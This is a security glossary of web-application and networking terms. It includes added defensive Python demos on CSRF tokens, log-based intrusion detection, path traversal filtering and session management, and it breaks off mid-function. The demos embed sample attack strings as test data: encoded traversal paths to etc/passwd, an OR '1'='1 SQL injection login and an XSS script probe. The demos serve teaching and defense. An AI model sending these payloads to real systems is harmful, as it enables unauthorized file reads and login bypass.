Glossary of Key Terms

A

Advanced Encryption Standard (AES)

Based on the Rijndael cipher, a symmetric block cipher standard (FIPS 197) that operates on 128-bit blocks with keys of 128, 192, or 256 bits. AES replaced DES as the U.S. government's standard cipher.

Adware

Adware is any software application in which advertising banners are displayed while the program is running.

Affiliate marketing

In this model, companies affiliated with advertising agencies place ads on their sites for a financial incentive.

Analog transmissions

A method of voice transmission using a continuous signal that varies in amplitude and frequency.

Application hardening

The process of securing applications in use on a network.

Archie

An early search tool that indexed the contents of anonymous FTP archives. It predates Gopher, whose own search tool was Veronica.

ARPANET

The first computer network based on the packet-switching principle.

Attack

Execution of a plan to bypass security of systems and gain unauthorized access to a resource.

Audio conferencing

Establishing an audio meeting over a network or PSTN line.

Auditing

Keeping records of operations and transactions to assess the accuracy of processes.

Authentication Header (AH)

A protocol primarily responsible for the authentication and integrity verification of data packets. AH does not provide any form of encryption.

Authentication

The process of verifying that a user, device, or process is who or what it claims to be, typically by checking something it knows, has, or is.

Authorization

The process of giving an individual access to information after authentication.

Automatic directory listing

Identifies all of the files within a given directory on a Web server if the base file is not found. The base files refer to such files as index.html, default.htm, index.php, and so on.

Availability

The degree to which a system and its data are operable and accessible to authorized users when they are needed. One of the three goals of the CIA triad, alongside confidentiality and integrity.

B

Batch processing

A processing strategy in which transactions are not handled immediately; rather, receipts are collected and processed as a batch.

Black box testing

A software testing methodology that looks at available inputs for an application and the expected outputs from each input.

Blacklist

A practice of listing what is unacceptable and treating everything else as acceptable. Because a blacklist must anticipate every harmful input, attackers bypass it with an encoding or variant the list does not cover; allow-listing (whitelisting) known-good input is the stronger approach.

Bounce rate

The percentage of single-page visits to a Web site, or those visitors that "bounce away" to another site. The bounce rate is a standard measure of quality and relevance to the visitor. The lower the bounce rate, the better the site.

Broken authentication

The result when an attacker compromises authentication credentials, gaining access to all resources associated with those credentials. Social engineering is a common method of obtaining user IDs and passwords.

Brute-force attack

An attack that tries every possible value in turn, such as every key in a cipher's keyspace or every candidate password, until one works. Its feasibility depends on the size of the keyspace and the rate at which guesses can be tested.

Buffer overflow

Occurs when a program writes more data into a buffer than the space reserved for it, overwriting adjacent memory. Attackers exploit this to corrupt data, crash the program, or execute code of their choosing.

Bulletin Board System (BBS)

A centralized system through which users can exchange messages; a message board.

C

Calendaring software

Software used to maintain personal or group schedules.

Canonicalization attacks

Attacks that exploit the fact that the same resource name can be written in many equivalent forms (for example, "../" as "..%2F" or "%2e%2e/", or with backslashes) so that a filter which checks one form is bypassed by another. The classic case is backtracking up a directory path with "../" (dot, dot, slash) to reach areas not intended to be accessible. See also path traversal attack.

CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart)

Mechanisms used to protect against automated attacks. The function of CAPTCHA is to provide a challenge/response mechanism to help ensure that a Web form is being filled out by a human and not an automated process.

Carbon copy (CC)

Named when carbon paper was used to make a copy, this is an e-mail sent to one or more recipients apart from the primary (To:) recipient.

Centralized processing

Processing is offloaded from the client onto a centralized server. Cloud computing is an example of centralized processing.

Change management

A standardized approach to handling changes to the IT infrastructure.

Circuit switching

A dedicated, physical, point-to-point connection between the sending and receiving devices.

Click-through rate (CTR)

Measures the number of times an Internet ad is clicked, versus the times it's viewed.

Client privacy agreement

An agreement that outlines what can and cannot be done with the personal data of visitors to a Web site.

Client/server

A computing environment in which one machine (the client) makes requests while another machine (the server) fulfills the requests.

Client-side validation

Input validation performed in the browser, for example by JavaScript, before a form is submitted. It improves usability but is not a security control: an attacker can disable or bypass it and send arbitrary requests directly, so every check must be repeated on the server.

Cloud computing

Delivering hosted services over the Internet, which includes providing infrastructures, platforms, and software as services.

Common Gateway Interface (CGI)

A standard that defines how a Web server passes a request, including form data, to an external program and returns the program's output as the response.

Common message store (CMS)

Centralized storage for unified messages.

Common Vulnerabilities and Exposures (CVE) list

A dictionary of publicly known vulnerabilities in software and hardware, maintained by the MITRE Corporation with U.S. Department of Homeland Security sponsorship. Each entry has a unique identifier (CVE-YYYY-NNNN) and a brief description so that tools and advisories can refer to the same flaw consistently.

Compatibility testing

A software testing method designed to verify how well an application functions with other software, such as the operating system or other Web applications. Interoperability is a significant concern, and application testing must ensure compatibility with other popular software.

Computer incident response team (CIRT)

CIRTs are now normally higher level coordination bodies with wider responsibilities for vulnerability and attack research and issuing warning and vulnerability notices. The original term for what is now commonly called a CSIRT.

Computer security incident response team (CSIRT)

An all-hours or on-call group for an organization, corporation, or country designed to respond to online attacks or similar events. May also be called an information system incident response team (ISIRT).

Confidentiality

Ensuring that information is accessible only to authorized users.

Content adaptation

How mobile phones handle Web and multimedia content intended for more powerful systems with larger screens.

Content spoofing

Presenting attacker-controlled content so that it appears to come from a legitimate Web site. This may take the form of a look-alike site, or of text or markup injected into a legitimate page through an unvalidated parameter. Victims lured to such content are typically tricked into entering logon credentials, credit card numbers, or other personal data.

Convergence

The evolution of different types of devices into a more common form that has a combination of features.

Conversion rate

Represents the percentage of visitors who perform a desired action against those that do not. The higher the conversion rate, the better the site.

Cost per click (CPC)

Represents the amount an advertiser pays each time a user clicks an ad.

Cracker

A cybercriminal intending harm to systems and networks.

Cross-site request forgery (CSRF) attack

Exploits the trust a Web site has in a user's browser. Once a visitor is authenticated, the browser automatically attaches the site's cookie to every request destined for that site, so a request triggered by a malicious page the victim happens to visit is indistinguishable from one the victim intended. Defenses include per-session anti-CSRF tokens that a third-party page cannot read and the SameSite cookie attribute.
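
The following is an added illustration, not code from the glossary or its source text. It models a funds-transfer endpoint twice: the first version trusts any request carrying a valid session cookie, which is exactly what a forged cross-site form exploits because the browser attaches the cookie by itself; the second also demands a per-session anti-CSRF token (the "synchronizer token" pattern) that a third-party page cannot read, compared in constant time. The session table, balances, and request dictionaries are constructed for the demo; the function names are hypothetical.

```python
"""CSRF: cookie-only authentication versus a synchronizer token (added example)."""
import hmac
import secrets

# Constructed server state: one logged-in user with a session cookie and a balance.
SESSIONS = {"sid-alice": {"user": "alice", "csrf": secrets.token_urlsafe(32)}}
BALANCES = {"alice": 100, "mallory": 0, "bob": 0}


def _move(src, dst, amount):
    BALANCES[src] -= amount
    BALANCES[dst] = BALANCES.get(dst, 0) + amount


def transfer_vulnerable(request):
    """Authenticates by cookie only; any site can trigger this from the victim's browser."""
    session = SESSIONS.get(request["cookies"].get("sid"))
    if session is None:
        return 401
    _move(session["user"], request["form"]["to"], int(request["form"]["amount"]))
    return 200


def transfer_protected(request):
    """Requires the session's secret token in the form body in addition to the cookie."""
    session = SESSIONS.get(request["cookies"].get("sid"))
    if session is None:
        return 401
    supplied = request["form"].get("csrf_token", "")
    # Constant-time comparison so a wrong token leaks nothing through timing.
    if not hmac.compare_digest(supplied.encode(), session["csrf"].encode()):
        return 403  # token missing or wrong: treat the request as forged
    _move(session["user"], request["form"]["to"], int(request["form"]["amount"]))
    return 200


def forged_request():
    """What the victim's browser sends when a malicious page auto-submits a form to us.

    The cookie is attached by the browser; the attacker never sees the CSRF token.
    """
    return {"cookies": {"sid": "sid-alice"},
            "form": {"to": "mallory", "amount": "25"}}


def legitimate_request():
    """Our own page embedded the token in the form, so it is present."""
    return {"cookies": {"sid": "sid-alice"},
            "form": {"to": "bob", "amount": "10",
                     "csrf_token": SESSIONS["sid-alice"]["csrf"]}}


def run_scenarios():
    """Returns (vulnerable_status, protected_forged_status, protected_legit_status, balances)."""
    BALANCES.update({"alice": 100, "mallory": 0, "bob": 0})
    v = transfer_vulnerable(forged_request())     # 200: money moved to mallory
    f = transfer_protected(forged_request())      # 403: forged request rejected
    l = transfer_protected(legitimate_request())  # 200: real form submission accepted
    return v, f, l, dict(BALANCES)


if __name__ == "__main__":
    print(run_scenarios())
```

The vulnerable handler cannot tell the forged and legitimate requests apart because both carry the same cookie; only the token, which lives in the page the site itself served, distinguishes them.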

Cross-site scripting (XSS)

A well-known Web application vulnerability in which untrusted input is included in a page without proper encoding, so that script supplied by an attacker runs in other users' browsers in the context of the vulnerable site. A successful attack can read session cookies and other data, perform actions as the victim, or rewrite the page. See also reflected XSS attack, stored XSS attack.

Cryptographic key

The confidential component of a cryptographic system: the value that, together with the algorithm, determines how plaintext is converted to ciphertext and back. In a symmetric system the single key is secret; in an asymmetric system only the private key is, while the public key may be distributed freely.

Cyberstalking

Constant and unwelcome electronic tracking of another person.

D

Data Encryption Standard (DES)

An older symmetric block cipher standard with a 64-bit block and a 56-bit key. The key is short enough to be recovered by brute force with modern hardware, so DES is considered insecure and has been superseded by AES.

Denial of service (DoS)

An attack that can result in decreased availability of the targeted system.

Development environment

The environment in which programmers develop, test, and upgrade software systems applications. Compare with a production environment.

Digital certificate

A small electronic file that binds a public key to the identity of its owner (a person, organization, or Web site) and is signed by a certification authority (CA). Browsers use a site's certificate to authenticate it and to set up an encrypted session. The owner's private key, not the certificate itself, is what creates digital signatures, which can offer non-repudiation.

Digital transmissions

A method of voice transmissions in which sounds are encoded digitally as a series of numbers that represent pitch and volume at each instant in time.

Discretionary access control (DAC)

An access control method in which access is not forced from the administrator or the operating system; rather, access is controlled by the information's owner.

Distributed application

An application whose processing is divided across multiple computers over a network. Typically, the divisions, or tiers, are presentation, business logic, and data store layers.

DNS namespace

An organized, hierarchical division of DNS names.

Domain Name System (DNS)

A hierarchical system for naming resources on a network as well as providing translation between the resource's IP address and its domain name.

E

E-commerce

The buying and selling of goods and services over electronic systems such as the Internet.

Electronic cash

Currency that you purchase with a credit, charge, or debit card, and then download to your computer or smart card.

Electronic wallet

An electronic storage device for electronic currency and information about the owner of the wallet.

E-mail filtering

The process of identifying potentially risky e-mail and stopping it from reaching the end user.

E-mail filtering software

A program that can identify a potentially risky e-mail and stop it from reaching the end user.

Encapsulating Security Payload (ESP)

A protocol that provides encryption for network data and can also provide authentication and integrity. ESP's integrity protection covers only the ESP header, payload, and trailer; the outer IP header is not protected, unlike with AH, which also authenticates the immutable fields of the IP header.

Encryption

The process of encoding information. The act of making text or data unreadable without possession of a translation key.

Endpoint device

A device or system that connects users to a communications or data network.

Enumeration

Actively identifying the services, software versions, user accounts, shares, and other components present on a system, typically after scanning has shown which hosts and ports are live.

E-reader

An electronic tablet device that allows a user to download, store, and read digital books.

Extensible Markup Language (XML)

A set of rules for encoding documents in a machine-readable text format. XML was chosen as the standard message format for Web services because of its widespread use and its open, vendor-neutral development.

F

Failure to restrict URL access attack

Occurs when a Web application protects a page only by not linking to it, rather than by checking the user's authorization on every request. An attacker who guesses or discovers the URL of an administrative or otherwise privileged page can then browse to it directly.

Fax server

A computer-based fax machine.

Feature freeze

A software state in which development continues but no additional features are added to the product.

Federal Desktop Core Configuration (FDCC)

A regularly updated U.S. federal government project that sets a minimum security configuration for Microsoft Windows XP and Windows Vista computers that are used as general-purpose desktops.

File Transfer Protocol (FTP)

A protocol used for file exchange.

Fingerprinting

Identifying the type and version of operating system that is running on a system.

Forum of Incident Response and Security Teams (FIRST)

A worldwide voluntary and collaborative body bringing together incident response teams and related organizations. It encourages rapid and secure communications between affected communities and allows in-confidence information sharing. It also supports an annual conference and hosts special interest groups and regular training events.

G

Google Docs

Google's proprietary Web-based office application software that offers word processing, spreadsheets, and presentations.

Gopher

An early Internet protocol for retrieving documents through hierarchical menus resembling a file tree; it was largely displaced by the Web.

Graphical user interface (GUI)

An interface based on graphical elements as opposed to text only.

Gray box testing

A software testing methodology that provides the middle ground between black box and white box testing. It looks at the input and output of applications and the inner workings of the application.

Groupware

A system of tools that facilitates group collaboration. Groupware may include calendar software and instant messaging applications.

Guideline

A non-enforced suggestion for increasing functioning and performance.

H

Hacker

Generally known as a cybercriminal. However, hackers are actually well-intentioned or "good" infiltrators who edit and modify applications. Crackers are those with malicious intent. Most people today use the term "hacker" to mean "cracker."

Honeypot

A carefully monitored system set up by security professionals to be attacked, so that attack sources and methods can be analyzed.

Host-based security

Security measures such as firewalls, IDSs, and antivirus solutions installed directly on a client system.

Hypertext

Text as non-sequential links to other text or documents.

Hypertext Markup Language (HTML)

A set of tags, or rules, primarily used to specify formatting of Web documents.

Hypertext Transfer Protocol (HTTP)

A transfer protocol for exchanging hypertext documents over the Internet or an intranet.

Hypertext Transfer Protocol Secure (HTTPS)

HTTP carried over an encrypted TLS (formerly SSL) connection, providing confidentiality and integrity for Web traffic and authenticating the server through its certificate.

I

Identity theft

Assuming the online identity of a person.

Impersonation

From a Web site or Web application perspective, an attacker's attempt to use the session credentials of a valid user.

Indexing

An automatic process in which software programs known as spiders or bots examine Web sites collecting data and analyzing the Web sites' keywords. The results are stored and indexed in the search engine's database.

Information leakage

The exploitation by an attacker of information found or gathered which was intended only for authorized users.

Infrastructure as a Service (IaaS)

Delivery of infrastructure on demand, usually billed per amount of resources consumed.

Injection flaw attack

Occurs when untrusted input is sent to an interpreter (a database, an operating system shell, an LDAP directory, and so on) as part of a command or query and changes its meaning. This enables an attacker to bypass the application's access controls and create, change, delete, or read any data the application can access. The most common form is the SQL injection attack.

Input validation

The verification of all data received by an application against what is expected (type, length, format, and range) before it is used. Validation is a form of filtering in which unexpected or unwanted input is rejected, preferably by an allow-list of known-good values. It reduces the attack surface but does not replace output encoding or parameterized queries.

Insecure direct object reference vulnerability

A vulnerability in which an application exposes a reference to an internal object (a database key, file name, or account number) in a URL or form field and fails to check that the current user is authorized for that object. An attacker simply changes the reference to reach another user's data. Directory and path traversal are related but distinct attacks against file system paths.

Instant messaging (IM)

A program that allows users to exchange messages in real time.

Integration testing

A software testing method in which individual software modules are combined and tested as a group. Integration testing typically occurs after unit testing.

Integrity

Emphasizes the need for information to be delivered unaltered to the recipient.

International Information Systems Security Certification Consortium (ISC)2

A nonprofit professional and certification body that provides related programs for information security professionals.

Internet Key Exchange (IKE)

A protocol that manages the SA negotiation process for IPSec connections.

Internet Message Access Protocol (IMAP)

A TCP/IP protocol for reading e-mail held on a mail server. Mail is transported by SMTP and must be stored centrally until the user reads it, so a client protocol is needed to access the mailbox. Unlike POP, IMAP normally leaves messages on the server and lets clients manage folders there, so the same mailbox can be used from several devices.

Internet Protocol (IP)

The set of techniques used by many hosts for transmitting data over the Internet. Internet Protocol version 4 (IPv4) is still in common use today. IPv4 addresses use 32 bits. Internet Protocol version 6 (IPv6) is a more recent version of IP, and it uses 128 bits.

Internet Protocol Security (IPSec)

Secures communication between systems within a network as well as communications transmitted outside a LAN; can be used to encrypt, authenticate, and verify the integrity of communications.

Internet Relay Chat (IRC)

An early form of synchronous online conferencing.

Intrusion detection system (IDS)

A security mechanism that monitors traffic on a network (or activity on a host) and compares it against signatures of known threats or a baseline of normal behavior. An IDS is a passive measure: it alerts on suspicious activity but does not itself block it.

Intrusion prevention system (IPS)

A security mechanism that monitors and reacts to data packets traveling across a network. An IPS is an active security measure because it not only monitors but also blocks suspect traffic identified by the device.
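
As an added example (not from the glossary), the block below shows the core of a signature-based IDS in miniature: parse each Web-server access-log line, decode the request target, and match it against rules for path traversal, SQL injection, and XSS. The log lines, signatures, and IP addresses are constructed; note that the matcher decodes percent-encoding repeatedly before matching, since a literal "../" rule would otherwise miss "..%2F" or a double-encoded "%252e%252e".

```python
"""Signature-based detection over constructed access-log lines (added example)."""
import re
from urllib.parse import unquote

# Constructed sample lines in the common log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.7 - - [10/Oct/2023:13:55:40 +0000] "GET /download?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1024
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /login?user=admin'%20OR%20'1'%3D'1 HTTP/1.1" 302 0
10.0.0.9 - - [10/Oct/2023:13:56:10 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048
10.0.0.5 - - [10/Oct/2023:13:57:00 +0000] "GET /docs/a..b.html HTTP/1.1" 200 300
"""

# Each signature is (name, regex) and is applied to the DECODED request target.
SIGNATURES = [
    ("path_traversal", re.compile(r"\.\.[/\\]")),
    ("sql_injection", re.compile(r"'\s*(?:or|and)\s*'?\w*'?\s*=", re.IGNORECASE)),
    ("xss", re.compile(r"<\s*script\b", re.IGNORECASE)),
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return a dict of log fields, or None if the line does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def decode_target(target):
    """Percent-decode until stable so double encoding cannot hide a payload."""
    prev = None
    while prev != target:
        prev, target = target, unquote(target)
    return target


def scan(log_text):
    """Return [(ip, signature_name, decoded_target)] for lines matching a signature."""
    alerts = []
    for line in log_text.splitlines():
        fields = parse_line(line)
        if not fields:
            continue
        decoded = decode_target(fields["target"])
        for name, rx in SIGNATURES:
            if rx.search(decoded):
                alerts.append((fields["ip"], name, decoded))
                break  # one alert per line is enough here
    return alerts


if __name__ == "__main__":
    for ip, name, target in scan(SAMPLE_LOG):
        print(f"ALERT {name:15} from {ip}: {target}")
```

The last sample line ("a..b.html") is there to show why the traversal rule requires a separator after the dots: a bare ".." match would raise a false positive on an ordinary file name. An IPS would run the same matching inline and drop the matching request instead of only recording an alert.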

IP address

A unique numeric value assigned to a device in a network.

ISO 17024

The international standard for accrediting schemes that certify personal competences.

J

JavaScript

A scripting programming language most commonly used to add interactive features to Web pages.

L

Latency

A delay. Can apply to the sending, processing, transmission, storage, or receiving of information.

Least privilege

See principle of least privilege.

Lightweight Directory Access Protocol (LDAP)

A protocol for accessing and querying directory services such as Microsoft Active Directory and, historically, Novell Directory Services. Applications commonly use LDAP for authentication and to look up users, groups, and other objects, so LDAP queries built from user input are another target for injection attacks.

Local area network (LAN)

A computer network covering a small physical area, such as an office or the floor of a building.

M

Macro viruses

Malware written in the macro language of an application, most often the VBA macros of Microsoft Office, and embedded in documents so that it runs when the document is opened.

Mainframe

A high-performance computer usually used by large businesses requiring large-scale processing and availability.

Malicious software

Software designed to damage or disrupt the operation of a system. Also referred to as malware.

Malware

Software designed to damage or disrupt the operation of a system, such as a Trojan horse, worm, or virus. Also known as malicious software.

Malware hoax

An illegitimate announcement of new malware.

Mandatory access control (MAC)

An access control mechanism in which the system enforces access according to security labels (such as classification levels) assigned to subjects and objects by a central authority. Neither the information's owner nor an ordinary user can change those rules. Compare with discretionary access control.

Man-in-the-middle attack

An attack that relies on eavesdropping between the sender and receiver. Attackers use their position to listen and perhaps redirect or alter communication.

Microblogging

A form of blogging using limited content, such as Twitter.

Minicomputer

A computer of medium size with less processing capability than a mainframe, but more than a PC.

Mobile broadband

The ability to communicate at broadband (cable modem/DSL or faster) speeds while being connected to a cellular network.

Multimedia Messaging Service (MMS)

A service provided by cellular networks that allows the sending and receiving of multimedia messages between users. MMS content includes audio, video, digital images, ringtones, and more.

Multimedia Messaging Service Encapsulation Protocol

A specification from the Open Mobile Alliance. The specification details implementation requirements for any organization interested in providing Multimedia Messaging Service.

Multiple Points of Presence (MPOP)

Presence information is aggregated from several devices to a single presence status. The reported status is provided to other users.

N

Network Time Protocol (NTP)

A protocol within the TCP/IP protocol suite designed to synchronize clocks of computer systems over packet-switched networks.

O

Open source

A copyright or licensing system that, compared with conventional commercial licensing schemes, allows wide use and modification of the material.

Open Web Application Security Project (OWASP)

An organization that researches and publishes known security threats to Web applications and Web services.

Output handling

The way applications control their output data. Output data from an application may take the form of logging, printing, coding, error messages, or raw data to be passed on to another application.

Outsourcing

Companies send their information to third-party service providers for storage, processing, or transmission.

P

Packet switching

A method for moving data over a network. Data is split into chunks (packets), and each packet contains destination details. The packets of the original entity being transmitted are recomposed at the destination. Packets may travel though different paths from the source to the destination in the network.

Password

A secret word used for authentication.

Path traversal attack

An attack in which the attacker supplies a path containing sequences such as "../" to reach files, directories, and data outside the area the application intends to expose. It is typically accomplished by changing a file name or path parameter in the URL to point elsewhere on the server.
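
The block below is an added example, not code from the glossary, covering both the canonicalization and path traversal entries. `naive_resolve` is the blacklist approach: it strips the literal "../" and only then decodes the URL, so encoded separators, encoded dots, and "....//" all survive the filter and still resolve outside the document root. `safe_resolve` decodes, canonicalizes with `os.path.realpath`, and then requires the result to lie under the root. The document root (a temporary directory) and the payloads are constructed; the function names are hypothetical.

```python
"""Path traversal: a "../"-stripping filter versus canonicalize-then-check (added example)."""
import os
import tempfile
from urllib.parse import unquote


def naive_resolve(root, user_path):
    """Blacklist approach, filtered BEFORE decoding: remove '../' once and hope."""
    cleaned = user_path.replace("../", "")
    cleaned = unquote(cleaned)  # decoding after filtering is the classic ordering bug
    return os.path.normpath(os.path.join(root, cleaned))


def safe_resolve(root, user_path):
    """Decode, canonicalize, then require the result to stay under root.

    Raises ValueError for anything that escapes the document root.
    """
    root = os.path.realpath(root)
    decoded = unquote(user_path).replace("\\", "/")  # treat backslash as a separator too
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + os.sep):
        raise ValueError(f"path escapes document root: {user_path!r}")
    return candidate


def escapes_root(root, resolved):
    """True if `resolved` is neither root nor a descendant of it."""
    root = os.path.realpath(root)
    return resolved != root and not resolved.startswith(root + os.sep)


# Constructed payloads; each comment says what the naive filter does with it.
PAYLOADS = [
    "docs/readme.txt",           # benign request
    "../../etc/passwd",          # literal form: the naive filter does catch this one
    "..%2F..%2Fetc%2Fpasswd",    # encoded separators: filtered before decoding, so they survive
    "....//....//etc/passwd",    # stripping "../" once manufactures a fresh "../"
    "%2e%2e/%2e%2e/etc/passwd",  # encoded dots: no literal "../" for the filter to see
]


def demo():
    """Map each payload to (naive_resolver_escaped_root, safe_resolver_outcome)."""
    root = os.path.realpath(os.path.join(tempfile.gettempdir(), "wwwroot-demo"))
    os.makedirs(root, exist_ok=True)
    results = {}
    for p in PAYLOADS:
        naive_escaped = escapes_root(root, naive_resolve(root, p))
        try:
            safe_resolve(root, p)
            safe_outcome = "inside"    # resolved to a path under root (may simply not exist)
        except ValueError:
            safe_outcome = "rejected"
        results[p] = (naive_escaped, safe_outcome)
    return results


if __name__ == "__main__":
    for p, (naive_escaped, outcome) in demo().items():
        print(f"{p:28} naive escapes root: {str(naive_escaped):5}  safe_resolve: {outcome}")
```

The "....//" case is instructive: the safe resolver does not reject it, because after canonicalization "...." is just a (nonexistent) directory name inside the root. The payload only works against the naive filter because the filter itself creates the traversal sequence; checking the canonical form instead of pattern-matching the input sidesteps the whole class.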

Payment Card Industry Data Security Standard (PCI DSS)

A set of standards designed to help organizations that process credit card payments prevent fraud by having increased control over data and its exposure.

Pay-per-click (PPC) revenue model

An affiliate-based e-commerce model where sites pay affiliates for generating traffic to them.

PayPal

A transaction broker that facilitates payments between individuals or individuals and businesses. Located at http://www.paypal.com.

Penetration testing

An attempt to circumvent various layers of a system or application's security controls for the purpose of seeing how far into the system the attacker can get.

Performance testing

A software testing method that provides an accurate view of how applications perform in a large-scale deployment in a variety of production environments. These tests determine responsiveness under various workloads to ensure that the application works well under normal operational circumstances.

Personal identification number (PIN)

An authentication method that validates a user.

Phishing

A scam in which an impostor pretends to be a legitimate entity and tries to lure customers into divulging confidential information.

Physical security

A type of computer security that includes tangible protection devices.

Ping sweep

The act of sending ICMP echo requests (pings) to a range of IP addresses and determining which hosts are active from the replies received.

Platform as a Service (PaaS)

Delivery of a computing platform as a service.

Podcast

A podcast is a recorded audio program available for download from a Web site.

Point-to-Point Tunneling Protocol (PPTP)

An early protocol used to establish VPN tunnels. Its MS-CHAP authentication and RC4-based encryption have well-known weaknesses, so PPTP is no longer considered secure; IPSec- or TLS-based VPNs are preferred.

Policies

An organization's documented basic requirements supported by senior management.

Portal

A single point of access to a collection of resources.

Presence

The state or availability of a remote object.

Presence and availability

The ability and willingness of an end user to engage in communication. The information is controlled by the end user and gives real-time confidence that the user is accessible. Delivery is not automatic, but relies on technology or applications being enabled to provide it.

Principle of least privilege

The concept of providing users with as few privileges as possible, just enough to fulfill their network needs. It is a security measure that ensures users are not granted more permissions than needed.

Privacy

The protection of individual rights to non-disclosure.

Procedure

A task or set of tasks performed to implement a process.

Process validation

Checking that the steps of a transaction or online process are performed in the correct sequence, so that a user cannot skip a step such as payment or approval.

Production environment

A real-world practical environment in which applications are used for business purposes. Compare with a development environment.

Protocol

A defined policy or standard that users adhere to. Protocols are well-defined and accepted procedures. In computer networking, the term refers to algorithms for exchanging various types of data and their interpretation at origination and destination.

Public switched telephone network (PSTN)

The global collection of interconnected public telephone networks designed primarily for voice traffic.

Q

Qualified Security Assessor (QSA)

A person trained to conduct PCI DSS Security Assessments.

Qualified traffic

Web site visitors who are searching specifically for your goods or services.

R

Really Simple Syndication (RSS)

A family of standardized Web feeds used to publish changes in recently updated work, such as news.

Real-time communication

An immediate exchange of information.

Real-time processing

A credit card transaction in which processing is immediate.

Real-time Transport Control Protocol (RTCP)

The protocol for the purpose of managing and maintaining the quality of RTP.

Real-time Transport Protocol (RTP)

The protocol used for streaming audio or video in packets over an IP network.

Recovery testing

A software testing method that gauges the recovery capabilities of an application in the event of failure. Recovery testing determines whether an application can recover from a crash or hardware failure.

Reflected XSS attack

An XSS attack in which the malicious script is carried in a link (for example, in a URL parameter) and echoed back by the server in its response, so it executes when the victim follows the link. It typically relies on social engineering to deliver the link and targets one victim at a time. Compare with stored XSS attack.

Regression testing

A software testing method that checks for additional errors in software that may have been introduced in the process of upgrading or patching to fix other problems.

Regulation

A legal restriction with legal consequences. Regulations are not set by an organization but by applicable laws.

Regulatory compliance testing

A software testing method that ensures an application meets and adheres to appropriate standards.

Request for Comments (RFC)

A formal document from the Internet Engineering Task Force (IETF) that is the result of committee drafting and revision of a technical document.

Resource Description Framework (RDF)

A framework for conceptual modeling.

Risk

The likelihood that a threat will exploit a vulnerability, combined with the impact if it does; a source of danger or exposure to unauthorized use or compromise.

Rivest Cipher

A family of secret key cryptographic algorithms from RSA Security, Inc. The family includes RC2, RC4, RC5, and RC6. RC4, once widely used in SSL/TLS and WEP, has serious known weaknesses and is now prohibited in TLS.

Role-based access control

An access control mechanism in which access decisions are determined by the roles that individual users have as part of an organization.

Routing detour attack

A form of man-in-the-middle attack in which an intermediary attacker reroutes data to an alternate location.

Rule-based access control

An access control mechanism in which access to objects is controlled according to established rules.

S

Sandbox

A strategy for separating programs and running them in their own virtual space.

Sanitization

Inspection of user input for potentially harmful code and modifying the code according to predetermined guidelines. Sanitization often involves identifying and disallowing specific characters and syntax sequences.

Search engine optimization (SEO)

Refers to the strategies used to make a site rank higher in search engine results for relevant queries.

Secrecy

Protection from inadvertent information disclosure.

Secure Sockets layer (SSL)

The original protocol for establishing an encrypted link between a Web server and a Web browser so that data passed between them remains private and intact. All versions of SSL have known weaknesses and are deprecated; its successor, TLS, is what sites use today, although the name "SSL" persists in everyday usage.

Security association (SA)

A security agreement between two systems on a network that enables the secure exchange of data. For communication to occur, the sending system and receiving system must agree on the same SA.

Security testing

A software testing method that checks the security of an application. This includes testing for injection attacks, path traversal attacks, and if the software is vulnerable in other ways. Vulnerabilities need to be addressed before the software can be released.

Server

Combination of hardware and software intended to provide services to clients, usually over the Internet.

Server-side include (SSI) injection

An injection attack in which attacker-supplied input is placed into a page that the Web server processes for server-side include directives before sending it, so the injected directives execute on the server rather than in the client. It succeeds when the application fails to filter user-supplied input before writing it into such pages.

Service set identifier (SSID)

The name that identifies a wireless network. The access point broadcasts it in beacon frames (unless configured to hide it) and clients use it to select the network to join. It is not a secret and provides no authentication; that is the job of WPA2/WPA3 keys or 802.1X.

Session

The tracking of requests and communications between a Web server and a user. Because HTTP is "stateless" by design, Web applications and Web sites must create a session to carry information and authentication state from page to page.

Session hijacking

The exploitation of a valid computer session to gain unauthorized access to information and services within the targeted computer system.

Session ID

A unique, unpredictable token the server issues when a session begins and the client returns with each subsequent request (usually in a cookie) so the server can associate the request with stored session state. If the ID is guessable or exposed, an attacker can hijack the session.

Session Initiation Protocol (SIP)

An application-layer protocol designed to establish and maintain multimedia sessions.

Session management

Defines how systems handle and manage user sessions.
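
The block below is an added example (not code from the glossary) of the three properties the "Session ID" and "Session management" entries call for: IDs come from a cryptographically secure random source, the ID is replaced when the user logs in so that a pre-planted ("fixated") ID stops working, and an idle session expires. The store is an in-memory toy, the idle timeout is a constructed value, and the injectable clock exists only so the expiry path can be exercised without waiting.

```python
"""Session management basics: unguessable IDs, regeneration at login, idle timeout (added example)."""
import secrets
import time

IDLE_TIMEOUT = 900  # seconds; constructed value for the demo


class SessionStore:
    def __init__(self, clock=time.time):
        self._sessions = {}
        self._clock = clock

    def create(self):
        """Issue a fresh, unguessable session ID for an anonymous visitor."""
        sid = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._sessions[sid] = {"user": None, "last_seen": self._clock()}
        return sid

    def get(self, sid):
        """Return session data, or None if unknown or expired; refreshes last_seen."""
        data = self._sessions.get(sid)
        if data is None:
            return None
        now = self._clock()
        if now - data["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[sid]
            return None
        data["last_seen"] = now
        return data

    def login(self, sid, username):
        """Authenticate and regenerate the ID so a pre-login ID (fixation) is invalidated."""
        data = self.get(sid)
        if data is None:
            raise KeyError("no such session")
        del self._sessions[sid]
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = dict(data, user=username, last_seen=self._clock())
        return new_sid

    def logout(self, sid):
        self._sessions.pop(sid, None)


def fixation_scenario():
    """Attacker plants a known ID; after the victim logs in, that ID must be dead."""
    store = SessionStore()
    planted = store.create()                    # attacker obtains a valid anonymous ID
    victim_sid = store.login(planted, "alice")  # victim logs in while holding the planted ID
    return store.get(planted) is None and store.get(victim_sid)["user"] == "alice"


def timeout_scenario():
    """A session idle longer than IDLE_TIMEOUT is no longer valid."""
    now = [1_000_000.0]
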